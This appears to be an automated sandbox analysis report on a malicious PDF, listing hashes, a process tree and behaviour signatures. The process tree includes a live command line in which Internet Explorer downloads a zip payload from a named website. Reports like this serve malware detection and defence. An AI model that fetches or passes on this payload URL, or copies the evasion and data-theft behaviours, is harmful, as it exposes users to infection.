Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 13, 2023, 9:45 a.m.	April 13, 2023, 9:47 a.m.

Size	92.7KB
Type	PDF document, version 1.4
MD5	`fa243a28cdcbca70891853bfbbead0c1`
SHA256	`09f24d38f5ea58a1b5ffe6934973a3faa5ad919977e912e8389c269bf57b8303`
CRC32	`C5AD14D9`
ssdeep	`1536:RuV5OXZJgiKPp5F1uaYhT9xEhcmaYmZPKgUdYYYYYYYYYYYYYYYYYYYYYYYYYYYP:YPp5F1u9bQaY8P3QYYYYYYYYYYYYYYYT`
Yara	PDF_Format_Z - PDF Format

AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" C:\Users\test22\AppData\Local\Temp\ClaimCopy-1337.pdf
3036
- iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome "http://krishikannada.com/blo/hf98fh92.zip"
  1652
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1652 CREDAT:145409
    1844
explorer.exe C:\Windows\Explorer.EXE
1236
- chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  3004
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
    1968
- chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  2476
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
    3024
- chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  2120
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
    1596
- chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  3232
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef33c6e00,0x7fef33c6e10,0x7fef33c6e20
    3376
- firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
  3532
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
    3612

Name	Response	Post-Analysis Lookup
www.krishikannada.com	A 162.240.38.127	162.240.38.127
krishikannada.com	A 162.240.38.127	162.240.38.127

IP Address	Status	Action
162.240.38.127	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (50 out of 89 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:47 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0
IsDebuggerPresent April 13, 2023, 9:46 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\PATH

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 13, 2023, 9:47 a.m.	stacktrace: 0xce1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 03 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xce1f04 registers.r14: 10087624 registers.r15: 8791379383920 registers.rcx: 48 registers.rsi: 8791379315584 registers.r10: 0 registers.rbx: 0 registers.rsp: 10087256 registers.r11: 10090640 registers.r8: 2000388492 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14911504 registers.rbp: 10087376 registers.rdi: 67215392 registers.rax: 13508352 registers.r13: 10088216	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 13, 2023, 9:47 a.m.

stacktrace:

0xce1f04
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030

exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 03
exception.instruction: cmp dword ptr [rip + 0x2d18d], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xce1f04
registers.r14: 10087624
registers.r15: 8791379383920
registers.rcx: 48
registers.rsi: 8791379315584
registers.r10: 0
registers.rbx: 0
registers.rsp: 10087256
registers.r11: 10090640
registers.r8: 2000388492
registers.r9: 0
registers.rdx: 8796092887632
registers.r12: 14911504
registers.rbp: 10087376
registers.rdi: 67215392
registers.rax: 13508352
registers.r13: 10088216

Performs some HTTP requests (3 events)

request	GET http://krishikannada.com/blo/hf98fh92.zip
request	GET http://krishikannada.com/favicon.ico
request	GET http://www.krishikannada.com/wp-includes/images/w-logo-blue-white-bg.png

Allocates read-write-execute memory (usually to unpack itself) (50 out of 127 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x702c3000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 region_size: 593920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743a3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74447000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75069000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75bf2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75742000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71372000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x702c3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743a3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74447000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75069000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75bf2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75742000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 region_size: 16584704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7578f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7577c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2023, 9:45 a.m.	process_identifier: 1844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7575c000 process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process firefox.exe with pid 3612 crashed
__exception__ April 13, 2023, 9:47 a.m.	stacktrace: 0xce1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 03 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xce1f04 registers.r14: 10087624 registers.r15: 8791379383920 registers.rcx: 48 registers.rsi: 8791379315584 registers.r10: 0 registers.rbx: 0 registers.rsp: 10087256 registers.r11: 10090640 registers.r8: 2000388492 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14911504 registers.rbp: 10087376 registers.rdi: 67215392 registers.rax: 13508352 registers.r13: 10088216	1	0	0

Application Crash

Process firefox.exe with pid 3612 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

April 13, 2023, 9:47 a.m.

stacktrace:

0xce1f04
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030
0x7fe00000030

Steals private information from local Internet browsers (22 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
